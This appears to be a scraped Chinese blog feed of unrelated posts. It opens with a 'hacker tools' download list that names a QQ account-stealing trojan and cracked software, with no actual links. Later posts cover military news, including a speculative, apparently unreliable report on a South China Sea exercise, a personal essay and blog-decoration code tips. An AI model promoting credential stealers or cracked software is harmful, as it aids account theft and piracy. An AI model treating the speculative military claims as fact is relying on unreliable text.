78. 啊拉QQ大盗 v1.35
下载地址:
79.QQ病毒专杀工具XP QQKav钻石版
下载地址:
80.利客-QQ在线查看器
下载地址:
81.腾讯QQ2005 春节贺岁版
下载地址:
黑客其他电脑碧备工具
1.音速启动(VStart) v5.0 Build 8.30
下载地址:
软件简介:类似OICQ界面工具条绿色软件,极大节省了hacker的时间。
2.3721、网络猪、十大流氓软件卸载工具
下载地址:
软件简介:清除各种流氓软件,如3721,一搜工具条
3.迅雷 V5.0正式版
下载地址:
软件简介:迅雷是一款新型的基于多资源超线程技术的下载软件,让用户真正享受到下载的乐趣。
4.FlashGet.1.71中文破解10000任务和线程补丁
下载地址:
软件简介:不用说了吧 。呵呵!
5.Win2003系统专用优化工具包
下载地址:
6.瑞星杀毒软件 2005 联想专用版(可在任何计算机上***、升级)
下载地址:
7.lanker微型PHP+ASP管理器1.0双用版
下载地址:
8.McAfee 8.0i官方中文杀毒+4400正式引擎+补丁
下载地址:
9.[超强杀毒软件]AntiVir个人版
下载地址:
软件简介:功能强大,可以检测并移除超过 50,000种病毒,支持网络更新。
10.Ka ersky Anti-Virus Personal v5.0.372真正的简体中文版
下载地址:
软件简介:Ka ersky(卡巴斯基)杀毒软件来源于俄罗斯,是世界上最优秀、最顶级的网络杀毒软件, 查杀病毒性能远高于同类产品 。
11.金山毒霸 2005 安全组合装
下载地址:
12.IE工具:HijackThis V1.991
下载地址:
软件简介:它能够将绑架您浏览器的程序揪出来。
13.文本替换专家
下载地址:
软件简介:使用简单,功能强大,支持多级目录同时替换,支持大小写匹配,支持文件备份....
14.数据修复软件
下载地址:
软件简介:0PC I ector File Recovery是一个数据修复软件,它支持 Fat12/16/32 和 NTFS 文件系统。
15.EF Commander v3.94 多国语言版
下载地址:
软件简介:和 Norton Commander 差不多的文件管理工具,功能很是不错!利用界面二边分别为目的与来源,方便的来管理文件
16.傲游(Maxthon) 1.3.1正式版
下载地址:
软件简介:一个高度可定制的强大Web浏览器
17.WINISO5.30破解版
下载地址:
软件简介:WinISO是一个CD-ROM映像文件格式转换工具,并且可以直接编辑光盘映像文件!
18.注册表维护大师 2005.71
下载地址:
软件简介:这是一个修改计算机注册表,优化计算机系统的工具
19.(7.5)木马克星病毒库
下载地址:
20.木马克星***包
下载地址:
21.FlashGet.1.71中文破解10000任务和线程补丁
下载地址:
软件简介:FlashGet.1.71中文破解10000任务和线程补丁 +注册机< r去广告 + 10000任务 + 10000线程 补丁
22.超级兔子魔法设置 6.87 破解版
下载地址:
软件简介:提供几乎所有Windows的隐藏参数调整。优化系统、清除LJ、解决你碰到的各种问题。
23.windows优化大师 V6.6 Build 5.601 破解版
下载地址:
软件简介:从桌面到网络,从系统信息检测到系统清理、维护,Windows优化大师都为您提供比较全面的解决方案
24.WinRAR v3.50 Beta4 简体中文版
下载地址:
软件简介:官方简体中文版。WINRAR 是现在最好的压缩工具,界面友好,使用方便
25迅雷5.0.1.79
迅雷是一款新型的基于多资源超线程技术的下载软件,作为“宽带时期的下载工具”,迅雷针对宽带用户做了特别的优化,能够充分利用宽带上网的特点,带给用户高速下载的全新体验!同时,迅雷推出了“智能下载”的全新理念,通过丰富的智能提示和帮助,让用户真正享受到下载的乐趣。
( Mon, 16 Mar 2009 13:05:05 +0800 )
Description: | | | | | | | |
中国军事首页
世界军校
特种部队
军纪军规
军事名将
经典战例
博客圈
{$MY_底部通栏970*90}
您现在的位置: gt gt gt gt gt gt 子栏目导航 专 题 栏 目 [组图] [组图] [组图] [组图] [组图] [组图] [组图] [组图] [组图] [组图] [组图] [组图] [组图] [组图] [组图]
[组图]
[图文]
[组图]
[图文]
[图文]
[图文]
[组图]
[组图]
[组图]
[组图]
[图文]
[组图]
[组图]
[组图]
[图文]
[图文]
[图文]
[图文]
[组图]
[组图]
[图文]
[图文]
[组图]
没有任何图片文章
[图文]
[图文]
[图文]
[图文]
[图文]
[图文]
[图文]
[组图]
[图文]
[组图]
没有任何图片文章
[组图]
[组图]
[组图]
[组图]
[图文]
本栏最新热门图片
站内文章搜索
文章标题文章作者录 入 者关键字 所有栏目中国军情武器装备 ├ 中国陆军装备 │ ├ 坦克 │ ├ 装甲车 │ ├ 高射炮 │ ├ 反坦克武器 │ ├ 迫击炮 │ ├ 火箭炮 │ ├ 榴弹炮 │ ├ 火控系统 │ ├ 地雷系列 │ ├ 布雷装备 │ ├ 加农炮 │ ├ 其它装备 │ ├ 直升机 │ ├ 无后座力炮 │ ├ 军车 │ ├ 工程装备 │ └ 坦克装甲车辆发动机 ├ 中国海军装备 │ ├ 驱逐舰 │ ├ 护卫舰 │ ├ 潜艇 │ ├ 护卫艇 │ ├ 导弹艇 │ ├ 鱼雷快艇 │ ├ 布、扫雷舰 │ ├ 猎潜艇 │ ├ *** │ ├ 反潜火箭 │ ├ 鱼雷 │ ├ 舰炮 │ ├ 其它装备 │ ├ 登陆舰 │ ├ 辅助舰只 │ ├ 干扰火箭 │ └ 清朝龙旗舰队 ├ 中国空军装备 │ ├ 歼击机 │ ├ 强击机 │ ├ 轰炸机 │ ├ 运输机 │ ├ 教练机 │ ├ 预警机 │ ├ 加油机 │ ├ 无人机 │ ├ 电子战机 │ ├ 航空发动机 │ └ 其它装备 ├ 中国台湾陆军 │ ├ 坦克、装甲车 │ ├ 火炮系列 │ ├ 火箭炮系列 │ ├ 迫击炮 │ ├ 高射炮 │ ├ 飞机 │ ├ 导弹/炸弹 │ └ 轻武器 ├ 中国台湾海军 │ ├ 驱逐舰 │ ├ 护卫舰 │ ├ 潜艇 │ ├ 导弹快艇 │ ├ 两栖舰艇 │ ├ 扫雷舰 │ ├ 辅助舰船 │ ├ 作战飞机 │ └ 导弹/鱼雷 ├ 中国台湾空军 │ ├ 战斗机 │ ├ 侦察机 │ ├ 运输机 │ ├ 教练机 │ ├ 攻击机 │ └ 导弹 ├ 电子、雷达装备 │ ├ 陆基雷达 │ ├ 机载雷达 │ └ 舰载雷达 ├ ***支弹药 │ ├ 步***系列 │ ├ 手***系列 │ ├ 手榴弹 │ ├ 冲锋***系列 │ ├ 轻机***系列 │ ├ 重机***系列 │ ├ 坦克用机*** │ ├ 高射机*** │ ├ 榴弹发射器 │ ├ 地雷 │ └ 其它装备 ├ 导弹装备 │ ├ 战略导弹 │ ├ 地空导弹 │ ├ 空地导弹 │ ├ 空空导弹 │ ├ 空舰导弹 │ ├ 舰射导弹 │ ├ 战术导弹 │ ├ 弹道导弹 │ └ 舰空导弹 └ 工程炸药 ├ 工业炸药 ├ 硝铵炸药 ├ 铵油炸药 ├ 含水炸药 ├ 胶质炸药 ├ 塑性炸药 ├ 挠性炸药 ├ 耐热炸药 ├ 低爆速炸药 ├ 液体炸药 ├ 起爆药剂 └ 起爆传爆器环球军事情报台海风云各国装备动态军事评论世界军校 ├ 中国军校 └ 环球军校 ├ 北美洲国家军事院校 ├ 欧洲国家军事院校 ├ 亚洲国家军事院校 ├ 南美洲国家军事院校 ├ 非洲国家军事院校 └ 大洋洲国家军事院校军史钩沉·军史资料 ├ 军史资料 └ 军史钩沉特种部队军纪军规军事名将 ├ 人民解放军名将 │ ├ 元帅 │ ├ 大将 │ ├ 上将 │ ├ 中将 │ └ 少将 ├ 古代名将 ├ 国民党名将 └ 世界军事人物兵法 ├ 中国兵法 └ 西方兵法经典战例 ├ 解放战争 ├ 抗日战争 ├ 第二次国内革命战争 ├ 第一次国内革命战争结束 ├ 1840-辛亥革命以前 ├ 第二次世界大战 ├ 一战与二战之间 ├ 第一次世界大战 ├ 国际战役 ├ 冷兵器时代 └ 早期火器时代博客圈 ( Sun, 15 Mar 2009 20:44:38 +0800 )
Description: 中国大陆近期在南海附近海域,宣布开始进行大规模现代化舰队编队演习。这里位于中国大陆控制的西沙群岛周边,距离我们与菲律宾演习地,仅仅只有100海里间隔。而中国大陆此次采取的是实弹演习。这难道是一般地对峙?
美国防务新闻报道:中国近期为了对抗美国在中国南中国海域,举行了空前规模的大型的海军舰队军事演习。出动了包含中国新型“元”级在内的12艘先进的潜艇。其中载有AIP系统9艘。核动力3艘。以及大批R,W级老式布雷潜艇。这是中国海军2000年以来首次公开近距离(间隔100海里)。对峙美国海军。而此次美国菲律宾联合军事演习。我们派遣了以斯丁克斯为主体的区域舰队。另外派遣3500名海军陆战第1旅作战部队。参加演习。而五角大楼发言人称:这是我们公正合理地协议性军事演习。是模拟战斗级别。
而中国海军此次演习则是实弹类型。而且中国官方称:警告任何国籍舰船不要靠近演习区域,以免发生不必要的“误伤”这是中国新届政府公开的对峙美国舰队的证据!也是中国近期以来军事膨胀野心的证明。
中国导弹驱逐舰168号参加了演习,他的部署特点与以前,有了变化。在其机库上方,以气***群附加中部桅杆的米平3坐标雷达所组成简易相控阵系统。是他的最新设置。而且他***了2门中部舰身高速进程武器。
在其机库上方依旧没有任何配置,很显然,这是中国军方设计上预留的空间,一边今后***大型垂直系统。而且,其尾部发现1做椴木据大型火控雷达。这部雷达最早见于俄罗斯海军大西洋级(基辅级反潜巡洋舰)巡洋舰。是专门用于控制发射大型N3级反潜远程导弹使用。这样可以说明。中国168号至少可以发射这种导弹。
而中国自称禁止武力制裁朝鲜,那么中国势必认为美国联合军事演习,是为了威慑朝鲜。由于在位于中国以及朝鲜海域接触地段,中国部署了大批的潜水***设施,这里很难适合美国海军大型战舰编队展开。因此,取道菲律宾进行演习,也是五角大楼海军部的无奈之举。
而此次画面中出现1架直8 直升机,这种飞机在中国海军序列中,早在99年就停止使用。而且,其舰载机身部没有任何武器配置以及必要地悬浮机翼。这说明这不是一架舰载直升机。而是来自中国西沙中国控制下的岛屿上的陆航部队。
中国此次演习是抱含了陆地支援在内的。因此,可以看出这是中国最大一次规模对美国舰队进行的示威活动。
( Sun, 15 Mar 2009 20:37:07 +0800 )
Description: 资料图:美国海军DDG-93“钟云”号阿利-伯克级导弹驱逐舰
中国船只8日在南海包围美军监测船“无瑕”号事件引发的余波持续震荡。
环球时报特约记者唐湘报道 据美国《弗吉尼亚向导报》3月12日报道,美国海军周三派出了一艘驱逐舰,为继续在中国南海海域执行“监测任务”的该国“无瑕”号监测船护航。
报道说,美国一位国防部官员周三证实,美国海军“钟云”号驱逐舰已于当天启航前往为继续在中国南海进行监测活动的“无瑕”号监测船护航。这位官员称,“钟云”号正在密切关注着“无瑕”号。
而与此同时,美国国务卿希拉里□克林顿刚刚同到访的中国外交部长杨洁篪举行会谈。希拉里在会后向记者表示,美国将同中国避免再次出现类似的事故。
另外,美国国会山强调中国军事威胁的团体“中国连线”联合主席兰迪□福布斯称,他希望美国坚决谴责中国“骚扰”美国监测船的举动。他说,周日的事件只是一系列事件中的一个,中国船只的接近“是蓄意的行动”。
福布斯赞扬美国海军派出驱逐舰的举动。他还补充说,美国国会必须发出“清晰、响亮的信号”,表明美国将保护其船只在“国际水域”活动的权利。
美国科学家联盟核武器分析人士汉斯·克里斯滕森周二在该组织网站上表示,最近发生的这一事件将是“一个更广泛和更危险的中美之间猫捉老鼠游戏的一部分”。
汉斯称,中美过去可能已经发生过更多的类似事件,但两国都没有说明。
“钟云”号是美国海军史上第一艘以华人名字命名的军舰。这艘DDG93驱逐舰是为纪念二战时击退日本神风敢死队的华裔海军少将钟云(Gordon Paie'a Chung-Hoon)而命名,配有“宙斯盾”作战系统,造价13亿美元,是目前世界海军最先进的驱逐舰之一
( Thu, 12 Mar 2009 21:57:04 +0800 )
Description:
( Mon, 26 Jan 2009 13:01:42 +0800 )
Description: 网友是否应该见面? 网友见面吧,激动,不见吧冲动。究竟网友是否应该见面呢?网友,网友...顾名思义,就是网络上的朋友。他和现实中的朋友不同,无论对方的美丑,胖瘦,年龄大小,身份,地位如何。只要两个人趣味相投,只要两个人诚心相待,都可以成为朋友,成为网络上的朋友。 其实,除了同学和同事。其他的大多是形式上的网友。我们真正意义上的网友不过三.四个。许多时候是因为寂寞,谁请求加入好友就通过了。有的一次也没聊过,有的聊几次就冲淡了新鲜感。 便在无话可说了。上线时看见对方的QQ头像在跳动,也没有聊的欲望了。 偶尔几句问候也是淡淡的。 网友一旦走出网络,就会失去生存的土壤。就失去了因为陌生和虚拟而带来的安全感和轻松感。所以,还是别轻易见面吧。除非你们的友谊超过了宽带。否则,见面就意味从此后彻底的决裂!有人说:网友是现实生活中的调剂和点缀。如蜻蜒点水,留下许多的波痕。有人说;网友是一种因距离和虚幻而产生的朦胧美,如雾里看花----美丽略带神秘。 是啊,在虚幻的世界里... 能有网友愿意替你分忧解难,在你快乐的时候愿意倾听你快乐的原由..在你烦恼的时候做你忠实的听众, 如蜻蜓点水,让平淡的生活起些微澜,就己经足够了。对于网友我们还能奢求什么呢?世界上最完美的女人和男人是存在人的想象中的!所以,我们还是不要破坏这朦胧的美吧!如果不见面,或许还有一个永久的朋友!如果一见面,一切美好的憧憬便从此消散了。你不觉得可惜吗? 所以,网友还是尽量不要见面! 别破坏了这种熟悉的陌生感飘渺的神秘感 ...。 ( Sun, 25 Jan 2009 20:43:17 +0800 )
Description:
( Sun, 25 Jan 2009 19:41:02 +0800 )
Description: ( Thu, 4 Dec 2008 14:48:02 +0800 )
Description: 熊猫???
有人上街溜熊猫??
国宝??冒牌的 狗狗!!! 松狮狗染成的Y熊猫 ( Wed, 19 Nov 2008 14:49:02 +0800 )
Description: ( Wed, 19 Nov 2008 14:41:12 +0800 )
Description:
( Fri, 10 Oct 2008 10:16:44 +0800 )
Description:
收藏到网摘:
( Fri, 10 Oct 2008 09:02:08 +0800 )
Description:
大家好:
我原来在我的网易博客发表了这篇文章,现在把它搬过来,因为这个方法不仅适用于网易博客,也适用于其他博客。
我下面介绍的这个HTML命令,如果大家喜欢。把背景图片衬托到日志后面,对美化、丰富你的日志将是一个重大的变革,放暇这几天我一直寻求和探索着,通过学习和试验,我不但找到了实现这一功能的命令,而且相当简单。
第一步:正常编写日志。这一步大家都会,而且日志多的朋友可以有几百篇了吧。旧日志也可以翻新啊!加上效果后该日志还能更新和改编,真是爽死了!
第二步:在编辑日志的“全功能编辑”状态下,点日志右边的 这个符号(网易博客中是这样),是显示HTML原码的编辑状态。看到原码后把鼠标放在最上面,可以打一下回车空出一行以便插入该命令。
第三步:把这段命令放在最前面。
/Table/tr/tdTable width=100% background="
http://img.blog.163.com/photo/KWXOcMqZd yRGzPjnTqbQ==/919015798960742623.jpg
然后发表日志。看看效果吧!爽吧!别忘了我,这回咱们用网易博客的同胞们又有广阔的美博空间了!别忘了添加链接可以,但不要复制不要转载,谢谢奥!红色链接的是图片地址,可以跟据你的喜好变动,把你喜欢的图片镶进去吧!
当然你放什么样的动态图或背景图都可以,但最好把图片保存到你客中的相册里,再进行调用链接地址。
( Tue, 9 Sep 2008 13:57:11 +0800 )
Description:
贴图 博客装饰闪贴图 博客最最经典的闪字
最新最漂亮的闪贴图
空间精美的闪贴图素材
背景代码
给日志加花边的代码
17款播放器代码 透明FLASH--风景系列
【透明flash背景图片地址大全①blog .5d6d.com】
你不留言我就哭给你看--娃娃(博客挂件)
dudu娃娃访客计时器(博客挂件)
动态鲜花flash图片(博客素材) ( Tue, 9 Sep 2008 12:58:42 +0800 )
Description: 为人民服务:今天教大家做一款超漂亮的影音播方器 如何将QQ空间加入你的博客
一款女孩喜欢的心形跳动时钟 我的精美时间日历 一款精致小巧的播放器
新版网易“博客代码”使用简单五"点"(初学者必看)
我们来利用自定义模块通过代码来做自己的个性名片 让你心动的51播放器,新鲜的哦! 精美日历代码 最新FLASH透明背景大全
可以放照片的mp3播放器代码
如何在日志里面加入音乐,FLASH
教你做简洁的日志摘要
FLASH时钟
【滚动文字效果总汇『16种』】
[博客技巧]巧妙的文字竖排
滚动图片加链接代码
教你做个性的图片播放
首页邮票图案显示的制作(博客素材)
几款难见的时钟欢迎大家使用
恋人纪念日倒数计时器
给自己的日志配置日志小图标--纪录没天的心情
自己学做时钟代码
《士兵突击》官网FLASH日历
博客小装饰-日本写真女王网志装饰
可爱女孩公告板--hello2008+时钟
超级无敌可爱军曹时钟
滚动相册
表格制作方法及表格中的文